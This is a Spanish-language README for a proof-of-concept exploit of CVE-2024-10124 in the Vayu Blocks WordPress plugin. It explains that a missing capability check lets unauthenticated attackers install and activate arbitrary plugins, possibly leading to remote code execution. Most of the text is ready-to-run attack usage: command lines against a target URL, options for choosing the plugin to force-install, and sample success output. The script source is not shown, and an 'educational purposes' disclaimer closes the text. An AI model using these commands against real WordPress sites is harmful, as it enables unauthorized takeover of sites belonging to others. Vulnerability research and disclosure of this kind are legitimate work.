
Exploit de prueba de concepto para CVE-2024-10124 en el plugin Vayu Blocks de WordPress, que permite la instalación y activación no autorizadas de plugins para potencialmente lograr ejecución remota de código.
El plugin Vayu Blocks – Gutenberg Blocks para WordPress & WooCommerce es vulnerable a la instalación y activación arbitraria de complementos no autorizados debido a una falta de comprobación de capacidades en la función tp_install() en todas las versiones hasta la 1.1.1 inclusive. Esto permite que atacantes no autenticados instalen y activen complementos arbitrarios, lo que puede aprovecharse para lograr la ejecución remota de código si otro complemento vulnerable está instalado y activado. Esta vulnerabilidad fue parcialmente corregida en la versión 1.1.1.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version
Esto comprobará la versión del complemento vayu-blocks para determinar si el sitio es vulnerable.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress
Esto instalará el complemento por defecto hello-dolly
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name
Esto instalará el complemento plugin_name en el sitio objetivo.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://192.168.100.74/wordpress)
-p PLUGIN, --plugin PLUGIN
Plugin name (default: hello-dolly)
--check-version Check if the site is vulnerable based on plugin version
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"
Este script se proporciona únicamente con fines educativos. El autor no es responsable de ningún daño causado por el mal uso de este script.
| 🔍 | Comando | Descripción | Ejemplo |
|---|
| 🌐 | -u o --url | Especificar la URL objetivo del sitio WordPress. | -u http://192.168.100.74/wordpress |
| 🔒 | --check-version | Comprobar si el sitio es vulnerable según la versión. | -u http://192.168.100.74/wordpress --check-version |
| ⚙️ | -p o --plugin | Especificar el nombre del complemento (por defecto es hello-dolly). | -u http://192.168.100.74/wordpress -p plugin_name |